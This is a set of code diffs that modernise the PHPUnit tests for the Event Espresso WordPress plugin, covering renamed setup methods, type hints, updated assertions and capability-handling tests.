                 case 'TKT_end_date':
-                    $this->assertEquals($value, $ticket->end_date('U', null));
+                    $this->assertEquals($value, trim($ticket->end_date('U', null)));
                     break;
                 default:
                     $this->assertEquals($value, $ticket->get($prop));

--- a/tests/includes/EeAddonTestCase.php
+++ b/tests/includes/EeAddonTestCase.php
@@ -61,9 +61,9 @@ class EeAddonTestCase extends EE_UnitTestCase
 
 
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         require_once EE_TESTS_DIR . 'mocks/addons/EE_NewAddonMock.class.php';
         $this->pretendAddonHookTime();
         $this->registerAddon();
@@ -74,7 +74,7 @@ class EeAddonTestCase extends EE_UnitTestCase
 
 
 
-    public function tearDown()
+    public function tear_down()
     {
         //only need to reset if $this->_addon isn't set
         if ($this->addon instanceof EE_Addon) {
@@ -91,7 +91,7 @@ class EeAddonTestCase extends EE_UnitTestCase
             $this->stopPretendingAddonHookTime();
         }
         $this->deRegisterAddon();
-        parent::tearDown();
+        parent::tear_down();
     }
 
 

--- a/tests/includes/EspressoPHPUnitFrameworkTestCase.php
+++ b/tests/includes/EspressoPHPUnitFrameworkTestCase.php
@@ -39,7 +39,7 @@ class EspressoPHPUnitFrameworkTestCase extends TestCase
     }
 
 
-    public function setUp()
+    public function setUp(): void
     {
         // echo "\n\n" . strtoupper($this->getName()) . '()';
         parent::setUp();
@@ -47,7 +47,7 @@ class EspressoPHPUnitFrameworkTestCase extends TestCase
     }
 
 
-    public function tearDown()
+    public function tearDown(): void
     {
         if ($this->request instanceof RequestMock && ! $this->request->requestTypeIsSet()) {
             $this->request->setRequestType(RequestTypeContext::ADMIN);

--- a/tests/includes/factories/EE_UnitTest_Factory_For_Price.class.php
+++ b/tests/includes/factories/EE_UnitTest_Factory_For_Price.class.php
@@ -75,7 +75,7 @@ class EE_UnitTest_Factory_For_Price extends WP_UnitTest_Factory_For_Thing {
 	 * @since 4.3.0
 	 * @param int $PRT_ID EE_Price_Type ID
 	 */
-	private function _set_new_price_type( $PRT_ID = 0, $args ) {
+	private function _set_new_price_type( $PRT_ID = 0, $args = array() ) {
 		$this->_price_type = empty( $PRT_ID ) ? EEM_Price_Type::instance()->get_one_by_ID( $PRT_ID ) : $this->_create_price_type( $args );
 		//fail safe just in case (so we can be sure to have an price_type).
 		if ( empty( $this->_price_type ) ) {

--- a/tests/mocks/core/services/EE_Injector_Tester_With_Array_Session_Int_Constructor_Params.class.php
+++ b/tests/mocks/core/services/EE_Injector_Tester_With_Array_Session_Int_Constructor_Params.class.php
@@ -23,15 +23,14 @@ class EE_Injector_Tester_With_Array_Session_Int_Constructor_Params {
 	protected $integer_property;
 
 
-
-	/**
-	 * injector_tester constructor.
-	 *
-	 * @param array 		  $some_array
-	 * @param EE_Session_Mock $session
-	 * @param int             $some_int
-	 */
-	public function __construct( $some_array = array(), EE_Session_Mock $session, $some_int = 0 ) {
+    /**
+     * injector_tester constructor.
+     *
+     * @param array                $some_array
+     * @param EE_Session_Mock|null $session
+     * @param int                  $some_int
+     */
+	public function __construct(array $some_array = array(), EE_Session_Mock $session = null, int $some_int = 0) {
 		$this->array_property 	= $some_array;
 		$this->session_property = $session;
 		$this->integer_property = $some_int;

--- a/tests/mocks/core/services/EE_Injector_Tester_With_Array_Session_Int_Constructor_Params.class.php
+++ b/tests/mocks/core/services/EE_Injector_Tester_With_Array_Session_Int_Constructor_Params.class.php
@@ -1,26 +1,21 @@
 <?php
-if ( ! defined( 'EVENT_ESPRESSO_VERSION' ) ) {
-	exit( 'No direct script access allowed' );
-}
-
-
 
 /**
  * Class EE_Injector_Tester_With_Numerically_Indexed_Array_And_Session
  *
  * Description
  *
- * @package 	Event Espresso
- * @subpackage 	core
- * @author 		Brent Christensen
- * 
- *
+ * @package       Event Espresso
+ * @subpackage    core
+ * @author        Brent Christensen
  */
-class EE_Injector_Tester_With_Array_Session_Int_Constructor_Params {
+class EE_Injector_Tester_With_Array_Session_Int_Constructor_Params
+{
+    protected $array_property;
 
-	protected $array_property;
-	protected $session_property;
-	protected $integer_property;
+    protected $session_property;
+
+    protected $integer_property;
 
 
     /**
@@ -30,41 +25,38 @@ class EE_Injector_Tester_With_Array_Session_Int_Constructor_Params {
      * @param EE_Session_Mock|null $session
      * @param int                  $some_int
      */
-	public function __construct(array $some_array = array(), EE_Session_Mock $session = null, int $some_int = 0) {
-		$this->array_property 	= $some_array;
-		$this->session_property = $session;
-		$this->integer_property = $some_int;
-	}
+    public function __construct(array $some_array = [], EE_Session_Mock $session = null, int $some_int = 0)
+    {
+        $this->array_property   = $some_array;
+        $this->session_property = $session;
+        $this->integer_property = $some_int;
+    }
 
 
-
-	/**
-	 * @return array
-	 */
-	public function array_property() {
-		return $this->array_property;
-	}
-
-
-
-	/**
-	 * @return \EE_Session_Mock
-	 */
-	public function session_property() {
-		return $this->session_property;
-	}
+    /**
+     * @return array
+     */
+    public function array_property(): array
+    {
+        return $this->array_property;
+    }
 
 
+    /**
+     * @return EE_Session_Mock
+     */
+    public function session_property(): ?EE_Session_Mock
+    {
+        return $this->session_property;
+    }
 
-	/**
-	 * @return int
-	 */
-	public function integer_property() {
-		return $this->integer_property;
-	}
 
-
-
+    /**
+     * @return int
+     */
+    public function integer_property(): int
+    {
+        return $this->integer_property;
+    }
 }
-// End of file EE_Injector_Tester_With_Array_Session_Int_Constructor_Params.class.php
 // Location: tests/mocks/core/services/EE_Injector_Tester_With_Array_Session_Int_Constructor_Params.class.php

--- a/tests/mocks/core/services/request/RequestStackCoreAppMock.php
+++ b/tests/mocks/core/services/request/RequestStackCoreAppMock.php
@@ -21,7 +21,6 @@ defined('EVENT_ESPRESSO_VERSION') || exit;
  */
 class RequestStackCoreAppMock implements RequestDecoratorInterface, RequestStackCoreAppInterface
 {
-
     /**
      * @param RequestInterface  $request
      * @param ResponseInterface $response
@@ -31,7 +30,7 @@ class RequestStackCoreAppMock implements RequestDecoratorInterface, RequestStack
     {
         \EE_Error::add_error(
             'Back away! I will deal with this Jedi slime myself!',
-            __FILE__, __FUNCTION__, __LINE__
+            'RequestStackCoreAppMock', 'handleRequest', 34
         );
         return $response;
     }

--- a/tests/mocks/modules/EED_Ticket_Sales_Monitor_Mock.php
+++ b/tests/mocks/modules/EED_Ticket_Sales_Monitor_Mock.php
@@ -15,8 +15,8 @@ class EED_Ticket_Sales_Monitor_Mock extends EED_Ticket_Sales_Monitor
     public static function release_reservations_for_tickets(
         array $tickets_with_reservations,
         array $valid_reserved_ticket_line_items = array(),
-        $source = ''
-    ) {
+        string $source = ''
+    ): int {
         return parent::release_reservations_for_tickets(
             $tickets_with_reservations,
             $valid_reserved_ticket_line_items,

--- a/tests/testcases/admin_pages/events/Events_Admin_Page_Test.php
+++ b/tests/testcases/admin_pages/events/Events_Admin_Page_Test.php
@@ -32,18 +32,18 @@ class Events_Admin_Page_Test extends EE_UnitTestCase
     protected $_event;
 
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->delayedAdminPageMocks('events');
     }
 
 
-    public function tearDown()
+    public function tear_down()
     {
         unset($this->_admin_page);
         unset($this->_event);
-        parent::tearDown();
+        parent::tear_down();
     }
 
 

--- a/tests/testcases/admin_pages/events_decaf/Events_Admin_Page_Decaf_Test.php
+++ b/tests/testcases/admin_pages/events_decaf/Events_Admin_Page_Decaf_Test.php
@@ -42,16 +42,16 @@ class Events_Admin_Page_Decaf_Test extends EE_UnitTestCase {
 
 
 
-	public function setUp() {
-		parent::setUp();
+	public function set_up() {
+		parent::set_up();
 		$this->delayedAdminPageMocks( 'decaf_events' );
         $this->setupRequest();
         $this->useAdvancedEditor= EE_Registry::instance()->CFG->admin->useAdvancedEditor();
         EE_Registry::instance()->CFG->admin->setUseAdvancedEditor(false);
 	}
 
-	public function tearDown() {
-		parent::tearDown();
+	public function tear_down() {
+		parent::tear_down();
         EE_Registry::instance()->CFG->admin->setUseAdvancedEditor($this->useAdvancedEditor);
 	}
 

--- a/tests/testcases/admin_pages/messages/Messages_Admin_Page_Test.php
+++ b/tests/testcases/admin_pages/messages/Messages_Admin_Page_Test.php
@@ -21,8 +21,8 @@ class Messages_Admin_Page_Test extends EE_UnitTestCase {
 	protected $_MessageResourceManager;
 
 
-	public function setUp() {
-		parent::setUp();
+	public function set_up() {
+		parent::set_up();
 		$this->delayedAdminPageMocks( 'messages' );
 		$this->_load_requirements();
 	}

--- a/tests/testcases/admin_pages/pricing/espresso_events_Pricing_Hooks_Test.php
+++ b/tests/testcases/admin_pages/pricing/espresso_events_Pricing_Hooks_Test.php
@@ -33,9 +33,9 @@ class espresso_events_Pricing_Hooks_Test extends EE_UnitTestCase
 
 
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->loadAdminMocks();
     }
 

--- a/tests/testcases/admin_pages/registrations/EE_Registrations_List_Table_Test.php
+++ b/tests/testcases/admin_pages/registrations/EE_Registrations_List_Table_Test.php
@@ -23,8 +23,8 @@ class EE_Registrations_List_Table_Test extends EE_UnitTestCase {
 	protected $_mock;
 
 
-	public function setUp() {
-		parent::setUp();
+	public function set_up() {
+		parent::set_up();
 		$this->loadAdminMocks();
 	}
 

--- a/tests/testcases/admin_pages/registrations/Registrations_Admin_Page_Test.php
+++ b/tests/testcases/admin_pages/registrations/Registrations_Admin_Page_Test.php
@@ -478,7 +478,7 @@ class Registrations_Admin_Page_Test extends EE_UnitTestCase
         $where = $this->_admin_page->get_registration_query_parameters($this->_admin_page->get_request_data());
         $this->assertCount(1, $where[0]);
         $this->assertArrayHasKey('STS_ID', $where[0]);
-        $this->assertInternalType('array', $where[0]['STS_ID']);
+        $this->assertIsArray($where[0]['STS_ID']);
         $this->assertArrayContains('!=', $where[0]['STS_ID']);
         $this->assertArrayContains(EEM_Registration::status_id_incomplete, $where[0]['STS_ID']);
     }
@@ -630,7 +630,7 @@ class Registrations_Admin_Page_Test extends EE_UnitTestCase
         $this->assertCount(2, $where[0]);
         $this->assertArrayHasKey('OR*search_conditions', $where[0]);
         $this->assertArrayHasKey('Event.EVT_name', $where[0]['OR*search_conditions']);
-        $this->assertInternalType('array', $where[0]['OR*search_conditions']['Event.EVT_name']);
+        $this->assertIsArray($where[0]['OR*search_conditions']['Event.EVT_name']);
         $this->assertEquals('%gogogo%', $where[0]['OR*search_conditions']['Event.EVT_name'][1]);
         $this->request->unSetRequestParam('s', true);
     }
@@ -654,7 +654,7 @@ class Registrations_Admin_Page_Test extends EE_UnitTestCase
         $this->assertArrayHasKey('order_by', $query_params);
         $orderby = $query_params['order_by'];
         $this->assertCount(2, $orderby);
-        $this->assertInternalType('array', $orderby);
+        $this->assertIsArray($orderby);
         $this->assertArrayHasKey('REG_date', $orderby);
         $this->assertEquals('DESC', $orderby['REG_date']);
     }
@@ -678,7 +678,7 @@ class Registrations_Admin_Page_Test extends EE_UnitTestCase
         $this->assertArrayHasKey('order_by', $query_params);
         $orderby = $query_params['order_by'];
         $this->assertCount(2, $orderby);
-        $this->assertInternalType('array', $orderby);
+        $this->assertIsArray($orderby);
         $this->assertArrayHasKey('STS_ID', $orderby);
         $this->assertEquals('ASC', $orderby['STS_ID']);
         $this->assertArrayHasKey('REG_ID', $orderby);

--- a/tests/testcases/admin_pages/registrations/Registrations_Admin_Page_Test.php
+++ b/tests/testcases/admin_pages/registrations/Registrations_Admin_Page_Test.php
@@ -61,9 +61,9 @@ class Registrations_Admin_Page_Test extends EE_UnitTestCase
      * @throws InvalidInterfaceException
      * @since 4.10.2.p
      */
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         EE_Dependency_Map::register_dependencies(
             'EventEspresso\core\domain\services\admin\registrations\list_table\QueryBuilder',
             [
@@ -91,11 +91,11 @@ class Registrations_Admin_Page_Test extends EE_UnitTestCase
     }
 
 
-    public function tearDown()
+    public function tear_down()
     {
         //restore timezone to original setting
         update_option('timezone_string', $this->original_timezone_string);
-        parent::tearDown();
+        parent::tear_down();
     }
 
 

--- a/tests/testcases/admin_pages/registrations/form_sections/EERegistrationCustomQuestionsFormTest.php
+++ b/tests/testcases/admin_pages/registrations/form_sections/EERegistrationCustomQuestionsFormTest.php
@@ -12,9 +12,9 @@
  */
 class EERegistrationCustomQuestionsFormTest extends EE_UnitTestCase
 {
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->delayedAdminPageMocks('registrations');
 
     }

--- a/tests/testcases/admin_pages/transactions/Transactions_Admin_Page_Test.php
+++ b/tests/testcases/admin_pages/transactions/Transactions_Admin_Page_Test.php
@@ -38,9 +38,9 @@ class Transactions_Admin_Page_Test extends EE_UnitTestCase
     protected $_payment_method = null;
 
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->delayedAdminPageMocks('transactions');
     }
 

--- a/tests/testcases/core/EE_Addon_Test.php
+++ b/tests/testcases/core/EE_Addon_Test.php
@@ -40,8 +40,8 @@ class EE_Addon_Test extends EE_UnitTestCase{
         $this->_table_manager = new \EventEspresso\core\services\database\TableManager( $this->_table_analysis );
 		parent::__construct($name, $data, $dataName);
 	}
-	public function setUp(){
-		parent::setUp();
+	public function set_up(){
+		parent::set_up();
 		//let's just make a generic addon, but not bother registering it
         $loader = EventEspresso\core\services\loaders\LoaderFactory::getLoader();
         require_once dirname($this->_main_file_path) . '/EE_New_Addon.class.php';
@@ -60,10 +60,10 @@ class EE_Addon_Test extends EE_UnitTestCase{
 		add_filter( 'FHEE__EEH_Activation__create_table__short_circuit', array( $this, 'dont_short_circuit_new_addon_table' ), 20, 3 );
 	}
 
-	public function tearDown(){
+	public function tear_down(){
         //drop all the temporary tables we created during this test, because each subsequent test expects them to be gone
         $this->_table_manager->dropTables( $this->_temp_tables_added_by_addon );
-        parent::tearDown();
+        parent::tear_down();
     }
 
 

--- a/tests/testcases/core/EE_Base_Class_Repository_Test.php
+++ b/tests/testcases/core/EE_Base_Class_Repository_Test.php
@@ -17,8 +17,8 @@ class EE_Base_Class_Repository_Test extends EE_UnitTestCase {
 	 */
 	protected $repository;
 
-	public function setUp() {
-        parent::setUp();
+	public function set_up() {
+        parent::set_up();
 		require_once EE_TESTS_DIR . 'mocks/core/EE_Base_Class_Repository_Mock.php';
 		$this->repository = new EE_Base_Class_Repository_Mock();
 	}

--- a/tests/testcases/core/EE_Capabilities_Test.php
+++ b/tests/testcases/core/EE_Capabilities_Test.php
@@ -29,9 +29,9 @@ class EE_Capabilities_Test extends EE_UnitTestCase
 
 
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->CAPS = EE_Registry::instance()->CAP;
     }
 

--- a/tests/testcases/core/EE_Capabilities_Test.php
+++ b/tests/testcases/core/EE_Capabilities_Test.php
@@ -1,32 +1,23 @@
 <?php
+
 /**
  * Contains test class for /core/EE_Capabilities.core.php
  *
  * @since          4.5.0
  * @package        Event Espresso
  * @subpackage     tests
- */
-
-/**
- * All tests for the EE_Admin_Hooks class.
- *
- * @since          4.5.0
- * @package        Event Espresso
- * @subpackage     tests
- *
  * @group          caps
  */
 class EE_Capabilities_Test extends EE_UnitTestCase
 {
-
     const ADMINISTRATOR_ROLE = 'administrator';
-    const SUBSCRIBER_ROLE = 'subscriber';
+
+    const SUBSCRIBER_ROLE    = 'subscriber';
 
     /**
      * @var EE_Capabilities $CAPS
      */
     private $CAPS;
-
 
 
     public function set_up()
@@ -46,7 +37,7 @@ class EE_Capabilities_Test extends EE_UnitTestCase
     {
         //test getting admin capabilities (default)
         $admin_capabilities = $this->CAPS->get_ee_capabilities();
-        $this->assertFalse(isset($admin_capabilities[EE_Capabilities::ROLE_ADMINISTRATOR]));
+        $this->assertFalse(isset($admin_capabilities[ EE_Capabilities::ROLE_ADMINISTRATOR ]));
         $this->assertTrue(isset($admin_capabilities[0]));
         $first_cap = $admin_capabilities[0];
         $this->assertEquals('ee_read_ee', $first_cap);
@@ -61,7 +52,9 @@ class EE_Capabilities_Test extends EE_UnitTestCase
     }
 
 
-
+    /**
+     * @throws EE_Error
+     */
     public function test_add_new_capabilities_via_filtering_init_caps()
     {
         global $wp_roles;
@@ -72,11 +65,11 @@ class EE_Capabilities_Test extends EE_UnitTestCase
 
         //ok now add another cap, and re-init stuff and verify it got added correctly
         //add a new cap
-        add_filter('FHEE__EE_Capabilities__init_caps_map__caps', array($this, 'add_new_caps'));
+        add_filter('FHEE__EE_Capabilities__init_caps_map__caps', [$this, 'add_new_caps']);
         // but we'll need to set the reset flag to true if we want to do things this way
         $this->CAPS->init_caps(true);
         //check it got added
-        $this->assertArrayContains('ee_new_cap', $this->CAPS->get_ee_capabilities(EE_Capabilities::ROLE_ADMINISTRATOR));
+        $this->assertArrayContains('ee_new_cap', $this->CAPS->get_ee_capabilities());
         $user->add_role(EE_Capabilities::ROLE_ADMINISTRATOR);
         $this->assertTrue($this->CAPS->user_can($user, 'ee_new_cap', 'test'));
         //then check newly-created users get that new role
@@ -86,14 +79,17 @@ class EE_Capabilities_Test extends EE_UnitTestCase
         $this->assertTrue($this->CAPS->user_can($user_refreshed, 'ee_new_cap', 'test'));
     }
 
-    public function add_new_caps($existing_caps)
+
+    public function add_new_caps($existing_caps): array
     {
-        $existing_caps[EE_Capabilities::ROLE_ADMINISTRATOR][] = 'ee_new_cap';
+        $existing_caps[ EE_Capabilities::ROLE_ADMINISTRATOR ][] = 'ee_new_cap';
         return $existing_caps;
     }
 
 
-
+    /**
+     * @throws EE_Error
+     */
     public function testAddCaps()
     {
         $this->CAPS->init_caps(true);
@@ -103,20 +99,22 @@ class EE_Capabilities_Test extends EE_UnitTestCase
         $this->assertInstanceOf('WP_User', $user);
         $this->assertFalse($this->CAPS->user_can($user, 'ee_new_cap', 'test'));
         // ok now add a new cap, but this time using addCaps
-         $this->CAPS->addCaps(array(EE_Capabilities::ROLE_ADMINISTRATOR => array('ee_new_cap')));
+        $this->CAPS->addCaps([EE_Capabilities::ROLE_ADMINISTRATOR => ['ee_new_cap']]);
         //check it got added
-        $this->assertArrayContains('ee_new_cap', $this->CAPS->get_ee_capabilities(EE_Capabilities::ROLE_ADMINISTRATOR));
+        $this->assertArrayContains('ee_new_cap', $this->CAPS->get_ee_capabilities());
         $user->add_role(EE_Capabilities::ROLE_ADMINISTRATOR);
         $this->assertTrue($this->CAPS->user_can($user, 'ee_new_cap', 'test'));
         //then check newly-created users get that new role
         //refresh the roles' caps and the user object
-        $wp_roles = new WP_Roles();
+        $wp_roles       = new WP_Roles();
         $user_refreshed = get_user_by('id', $user->ID);
         $this->assertTrue($this->CAPS->user_can($user_refreshed, 'ee_new_cap', 'test'));
     }
 
 
-
+    /**
+     * @throws EE_Error
+     */
     public function test_add_cap_to_role()
     {
         $this->CAPS->init_caps(true);
@@ -126,18 +124,17 @@ class EE_Capabilities_Test extends EE_UnitTestCase
         $this->assertInstanceOf('WP_User', $user);
         $this->assertFalse($this->CAPS->user_can($user, 'ee_new_cap', 'test'));
         // ok now add a new cap, but this time using addCaps
-         $this->CAPS->add_cap_to_role(EE_Capabilities::ROLE_ADMINISTRATOR, 'ee_new_cap');
+        $this->CAPS->add_cap_to_role(EE_Capabilities::ROLE_ADMINISTRATOR, 'ee_new_cap');
         //check it got added
-        $this->assertArrayContains('ee_new_cap', $this->CAPS->get_ee_capabilities(EE_Capabilities::ROLE_ADMINISTRATOR));
+        $this->assertArrayContains('ee_new_cap', $this->CAPS->get_ee_capabilities());
         $user->add_role(EE_Capabilities::ROLE_ADMINISTRATOR);
         $this->assertTrue($this->CAPS->user_can($user, 'ee_new_cap', 'test'));
         //then check newly-created users get that new role
         //refresh the roles' caps and the user object
-        $wp_roles = new WP_Roles();
+        $wp_roles       = new WP_Roles();
         $user_refreshed = get_user_by('id', $user->ID);
         $this->assertTrue($this->CAPS->user_can($user_refreshed, 'ee_new_cap', 'test'));
     }
-
 
 
     /**
@@ -161,14 +158,11 @@ class EE_Capabilities_Test extends EE_UnitTestCase
         $this->assertFalse($this->CAPS->user_can($user, 'invalid_cap', 'tests'));
 
         //test context filter
-        function test_custom_filter($cap, $id)
+        function test_custom_filter($cap)
         {
-            if ($cap == 'ee_read_ee') {
-                return 'need_this_instead';
-            }
-
-            return $cap;
+            return $cap === 'ee_read_ee' ? 'need_this_instead' : $cap;
         }
+
 
         add_filter('FHEE__EE_Capabilities__current_user_can__cap__tests', 'test_custom_filter', 10, 2);
         add_filter('FHEE__EE_Capabilities__user_can__cap__tests', 'test_custom_filter', 10, 2);
@@ -186,6 +180,7 @@ class EE_Capabilities_Test extends EE_UnitTestCase
             return $cap;
         }
 
+
         add_filter('FHEE__EE_Capabilities__current_user_can__cap', 'test_global_filter', 10, 4);
         add_filter('FHEE__EE_Capabilities__user_can__cap', 'test_global_filter', 10, 4);
 
@@ -194,7 +189,9 @@ class EE_Capabilities_Test extends EE_UnitTestCase
     }
 
 
-
+    /**
+     * @throws EE_Error
+     */
     public function testRemoveCaps()
     {
         $this->CAPS->init_caps(true);
@@ -207,7 +204,7 @@ class EE_Capabilities_Test extends EE_UnitTestCase
         // for whatever reason, this site wants to have all gateways
         // under control of someone other than the standard administrator
         // so they want to remove the 'ee_manage_gateways' cap from the above administrator role
-        $this->CAPS->removeCaps(array(EE_Capabilities::ROLE_ADMINISTRATOR => array('ee_manage_gateways')));
+        $this->CAPS->removeCaps([EE_Capabilities::ROLE_ADMINISTRATOR => ['ee_manage_gateways']]);
         $user = $this->setupAdminUserAndTestCapDoesNOtExist('ee_manage_gateways');
         $this->assertFalse(
             $this->CAPS->user_can($user, 'ee_manage_gateways', 'test'),
@@ -216,7 +213,9 @@ class EE_Capabilities_Test extends EE_UnitTestCase
     }
 
 
-
+    /**
+     * @throws EE_Error
+     */
     public function test_remove_cap_from_role()
     {
         $this->CAPS->init_caps(true);
@@ -237,8 +236,7 @@ class EE_Capabilities_Test extends EE_UnitTestCase
     }
 
 
-
-    private function setupAdminUserAndTestCapDoesNOtExist($cap_to_test = '')
+    private function setupAdminUserAndTestCapDoesNOtExist($cap_to_test = ''): WP_User
     {
         /** @var WP_User $user */
         $user = $this->factory->user->create_and_get();
@@ -246,7 +244,7 @@ class EE_Capabilities_Test extends EE_UnitTestCase
         // verify they don't have the $cap_to_test YET...
         $this->assertFalse(
             $this->CAPS->user_can($user, $cap_to_test, 'test'),
-            'The admin user should NOT have the "'. $cap_to_test .'" capability YET!'
+            'The admin user should NOT have the "' . $cap_to_test . '" capability YET!'
         );
         // first remove the existing default role
         $user->remove_role(self::SUBSCRIBER_ROLE);
@@ -259,6 +257,9 @@ class EE_Capabilities_Test extends EE_UnitTestCase
     }
 
 
+    /**
+     * @throws EE_Error
+     */
     public function testPaymentMethodCaps()
     {
         // we're going to fake the activation of the Mock_Onsite payment method
@@ -271,7 +272,7 @@ class EE_Capabilities_Test extends EE_UnitTestCase
         $administrator_role = get_role(EE_Capabilities::ROLE_ADMINISTRATOR);
         $this->assertInstanceOf('WP_Role', $administrator_role);
         // verify two ways that cap does not exist YET...
-        $this->assertFalse(isset($administrator_role->capabilities[$mock_onsite_capability]));
+        $this->assertFalse(isset($administrator_role->capabilities[ $mock_onsite_capability ]));
         $this->assertFalse($administrator_role->has_cap($mock_onsite_capability));
         // now create an admin user
         $user = $this->setupAdminUserAndTestCapDoesNOtExist($mock_onsite_capability);
@@ -279,11 +280,11 @@ class EE_Capabilities_Test extends EE_UnitTestCase
         $this->_pretend_addon_hook_time();
         EE_Register_Payment_Method::register(
             'onsite',
-            array(
-                'payment_method_paths' => array(
+            [
+                'payment_method_paths' => [
                     EE_TESTS_DIR . 'mocks/payment_methods/Mock_Onsite',
-                ),
-            )
+                ],
+            ]
         );
         // to complete the fake PM registration, we need to reset the EE_Payment_Method_Manager
         // which will take care of injecting all Payment Method caps into the default cap map
@@ -322,7 +323,9 @@ class EE_Capabilities_Test extends EE_UnitTestCase
     }
 
 
-
+    /**
+     * @throws EE_Error
+     */
     public function testAddNewRoleWhenAddingCap()
     {
         $this->CAPS->init_caps(true);

--- a/tests/testcases/core/EE_Capabilities_Test.php
+++ b/tests/testcases/core/EE_Capabilities_Test.php
@@ -36,24 +36,24 @@ class EE_Capabilities_Test extends EE_UnitTestCase
     }
 
 
-
     /**
      * test the get_ee_capabilities method on EE_Capabilities class.
      *
+     * @throws EE_Error
      * @since 4.5.0
      */
     public function test_get_ee_capabilities()
     {
         //test getting admin capabilities (default)
         $admin_capabilities = $this->CAPS->get_ee_capabilities();
-        $this->assertFalse(isset($admin_capabilities[self::ADMINISTRATOR_ROLE]));
-        $this->assertTrue(is_array($admin_capabilities) && isset($admin_capabilities[0]));
+        $this->assertFalse(isset($admin_capabilities[EE_Capabilities::ROLE_ADMINISTRATOR]));
+        $this->assertTrue(isset($admin_capabilities[0]));
         $first_cap = $admin_capabilities[0];
         $this->assertEquals('ee_read_ee', $first_cap);
 
         //test getting all capabilities
         $all_caps = $this->CAPS->get_ee_capabilities('');
-        $this->assertArrayHasKey(self::ADMINISTRATOR_ROLE, $all_caps);
+        $this->assertArrayHasKey(EE_Capabilities::ROLE_ADMINISTRATOR, $all_caps);
 
         //test getting invalid capability
         $caps = $this->CAPS->get_ee_capabilities('no_exist');
@@ -76,8 +76,8 @@ class EE_Capabilities_Test extends EE_UnitTestCase
         // but we'll need to set the reset flag to true if we want to do things this way
         $this->CAPS->init_caps(true);
         //check it got added
-        $this->assertArrayContains('ee_new_cap', $this->CAPS->get_ee_capabilities(self::ADMINISTRATOR_ROLE));
-        $user->add_role(self::ADMINISTRATOR_ROLE);
+        $this->assertArrayContains('ee_new_cap', $this->CAPS->get_ee_capabilities(EE_Capabilities::ROLE_ADMINISTRATOR));
+        $user->add_role(EE_Capabilities::ROLE_ADMINISTRATOR);
         $this->assertTrue($this->CAPS->user_can($user, 'ee_new_cap', 'test'));
         //then check newly-created users get that new role
         //refresh the roles' caps and the user object
@@ -88,7 +88,7 @@ class EE_Capabilities_Test extends EE_UnitTestCase
 
     public function add_new_caps($existing_caps)
     {
-        $existing_caps[self::ADMINISTRATOR_ROLE][] = 'ee_new_cap';
+        $existing_caps[EE_Capabilities::ROLE_ADMINISTRATOR][] = 'ee_new_cap';
         return $existing_caps;
     }
 
@@ -103,10 +103,10 @@ class EE_Capabilities_Test extends EE_UnitTestCase
         $this->assertInstanceOf('WP_User', $user);
         $this->assertFalse($this->CAPS->user_can($user, 'ee_new_cap', 'test'));
         // ok now add a new cap, but this time using addCaps
-         $this->CAPS->addCaps(array(self::ADMINISTRATOR_ROLE => array('ee_new_cap')));
+         $this->CAPS->addCaps(array(EE_Capabilities::ROLE_ADMINISTRATOR => array('ee_new_cap')));
         //check it got added
-        $this->assertArrayContains('ee_new_cap', $this->CAPS->get_ee_capabilities(self::ADMINISTRATOR_ROLE));
-        $user->add_role(self::ADMINISTRATOR_ROLE);
+        $this->assertArrayContains('ee_new_cap', $this->CAPS->get_ee_capabilities(EE_Capabilities::ROLE_ADMINISTRATOR));
+        $user->add_role(EE_Capabilities::ROLE_ADMINISTRATOR);
         $this->assertTrue($this->CAPS->user_can($user, 'ee_new_cap', 'test'));
         //then check newly-created users get that new role
         //refresh the roles' caps and the user object
@@ -126,10 +126,10 @@ class EE_Capabilities_Test extends EE_UnitTestCase
         $this->assertInstanceOf('WP_User', $user);
         $this->assertFalse($this->CAPS->user_can($user, 'ee_new_cap', 'test'));
         // ok now add a new cap, but this time using addCaps
-         $this->CAPS->add_cap_to_role(self::ADMINISTRATOR_ROLE, 'ee_new_cap');
+         $this->CAPS->add_cap_to_role(EE_Capabilities::ROLE_ADMINISTRATOR, 'ee_new_cap');
         //check it got added
-        $this->assertArrayContains('ee_new_cap', $this->CAPS->get_ee_capabilities(self::ADMINISTRATOR_ROLE));
-        $user->add_role(self::ADMINISTRATOR_ROLE);
+        $this->assertArrayContains('ee_new_cap', $this->CAPS->get_ee_capabilities(EE_Capabilities::ROLE_ADMINISTRATOR));
+        $user->add_role(EE_Capabilities::ROLE_ADMINISTRATOR);
         $this->assertTrue($this->CAPS->user_can($user, 'ee_new_cap', 'test'));
         //then check newly-created users get that new role
         //refresh the roles' caps and the user object
@@ -149,7 +149,7 @@ class EE_Capabilities_Test extends EE_UnitTestCase
         //setup our user and set as current user.
         $user = $this->factory->user->create_and_get();
         $this->assertInstanceOf('WP_User', $user);
-        $user->add_role(self::ADMINISTRATOR_ROLE);
+        $user->add_role(EE_Capabilities::ROLE_ADMINISTRATOR);
         $current_user = $user;
 
         //check what should be a valid  cap
@@ -199,7 +199,7 @@ class EE_Capabilities_Test extends EE_UnitTestCase
     {
         $this->CAPS->init_caps(true);
         /** @var WP_Role $administrator_role */
-        $administrator_role = get_role(self::ADMINISTRATOR_ROLE);
+        $administrator_role = get_role(EE_Capabilities::ROLE_ADMINISTRATOR);
         $this->assertInstanceOf('WP_Role', $administrator_role);
         // verify two ways that cap exists
         $this->assertTrue(isset($administrator_role->capabilities['ee_manage_gateways']));
@@ -207,7 +207,7 @@ class EE_Capabilities_Test extends EE_UnitTestCase
         // for whatever reason, this site wants to have all gateways
         // under control of someone other than the standard administrator
         // so they want to remove the 'ee_manage_gateways' cap from the above administrator role
-        $this->CAPS->removeCaps(array(self::ADMINISTRATOR_ROLE => array('ee_manage_gateways')));
+        $this->CAPS->removeCaps(array(EE_Capabilities::ROLE_ADMINISTRATOR => array('ee_manage_gateways')));
         $user = $this->setupAdminUserAndTestCapDoesNOtExist('ee_manage_gateways');
         $this->assertFalse(
             $this->CAPS->user_can($user, 'ee_manage_gateways', 'test'),
@@ -221,14 +221,14 @@ class EE_Capabilities_Test extends EE_UnitTestCase
     {
         $this->CAPS->init_caps(true);
         /** @var WP_Role $administrator_role */
